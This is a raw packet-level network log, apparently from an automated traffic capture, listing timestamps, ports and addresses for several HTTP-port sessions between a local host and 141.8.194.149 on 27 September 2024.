                                  Sep 27, 2024 08:42:45.231254101 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231270075 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231303930 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231329918 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231347084 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231363058 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231414080 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231414080 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.232938051 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.460002899 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.464932919 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:56.465039015 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.465290070 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.470086098 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134569883 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134592056 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134618998 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134629965 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134633064 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134641886 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134654045 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134665012 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134673119 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134675980 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134686947 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134697914 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134716988 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134716988 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134737015 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.140736103 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.140750885 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.140762091 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.140836954 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.248677969 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248697042 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248707056 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248718977 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248778105 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.248805046 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248869896 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248884916 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248895884 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248905897 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.248919964 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.248945951 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.249841928 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.249861002 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.249872923 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.249882936 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.249886990 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.249893904 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.249905109 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.249929905 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.250665903 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.250677109 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.250689030 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.250720024 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.251174927 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.251211882 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.251235962 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.251271963 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.251281977 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.251305103 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.251322985 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.251343012 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.251971960 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.253587961 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.253598928 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.253637075 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.363081932 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363101006 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363133907 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363145113 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363172054 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363177061 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.363184929 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363197088 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363202095 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.363209009 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363220930 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363230944 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363241911 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363256931 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.363276958 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.363711119 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363748074 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.363795996 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.454768896 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.459845066 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.665817022 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.665863037 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.665915966 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.665966034 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666058064 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666107893 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666110992 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666140079 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666182041 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666182995 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666199923 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666214943 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666229010 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666244030 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666249037 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666259050 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666273117 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666274071 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666289091 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666301966 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666305065 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666318893 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666327000 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666333914 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666347980 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666363001 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666363001 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666377068 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666606903 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666618109 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666627884 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666661024 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666691065 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666702986 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666728973 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666738987 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666749001 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666755915 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666759968 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.666770935 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.666814089 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667313099 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667325974 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667336941 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667346954 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667361021 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667395115 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667557955 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667603016 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667613029 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667645931 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667684078 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667694092 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667704105 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667714119 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667732954 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667749882 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667756081 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667766094 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667776108 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667788029 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.667797089 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.667826891 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.668652058 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.668664932 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.668677092 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.668688059 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.668700933 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.668741941 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.668764114 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.690952063 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:20.926114082 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:20.931121111 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:20.931212902 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:20.931432962 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:20.936211109 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620825052 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620845079 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620876074 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620887041 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620907068 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620920897 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620933056 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620943069 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620954037 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.620954990 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.620970964 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.621126890 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.625768900 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.625782013 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.625880003 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.735604048 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735619068 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735627890 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735831022 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735841036 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735851049 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.735865116 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.735891104 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.735899925 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.736211061 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.736242056 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.736253023 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.736283064 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.736329079 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.736340046 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.736386061 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.737019062 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737072945 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.737076998 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737109900 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737121105 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737131119 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737150908 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.737170935 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.737960100 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737970114 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.737981081 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.738013029 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.738071918 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.738085985 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.738122940 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.738785982 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.738835096 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.753895998 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.753906012 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.754019022 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.826337099 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.826349020 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.826359034 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.826473951 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.850661993 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850692987 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850708961 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850719929 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850729942 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850739956 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850790977 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850800991 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850811005 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.850827932 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.850827932 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.850869894 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.850869894 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.851524115 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.851567984 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.851581097 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:21.851612091 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.854018927 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:21.858808994 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065361023 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065407991 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065466881 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.065561056 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065593004 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065606117 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065640926 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.065651894 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065670967 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.065725088 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066025972 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066054106 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066065073 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066076040 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066082001 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066091061 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066109896 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066128969 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066562891 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066576958 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066591978 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066642046 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066642046 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066654921 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066668034 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066679001 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.066689014 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.066715956 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.067501068 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067512989 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067543983 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067553997 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.067555904 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067574024 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067579985 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.067585945 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067600012 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.067626953 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.067646980 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.068392992 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068417072 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068428040 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068463087 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.068510056 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068521976 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068533897 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068546057 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.068553925 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.068587065 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.069343090 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069355011 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069366932 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069377899 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069390059 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069391966 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.069401979 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069407940 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.069417000 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.069444895 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.069469929 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.070163012 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070184946 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070203066 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070214033 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070225000 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070234060 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.070238113 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070245981 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.070251942 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.070278883 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.070997953 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.071021080 CEST8049718141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:22.071059942 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:22.072599888 CEST4971880192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:35.260380983 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:35.265382051 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:35.265465021 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:35.265680075 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:35.270406008 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033165932 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033195019 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033206940 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033217907 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033229113 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033241034 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033252001 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033260107 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.033263922 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033274889 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033288002 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033299923 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.033308029 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.033332109 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.038064003 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.038077116 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.038145065 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.060461044 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060473919 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060484886 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060523987 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.060537100 CEST4971980192.168.2.9141.8.194.149
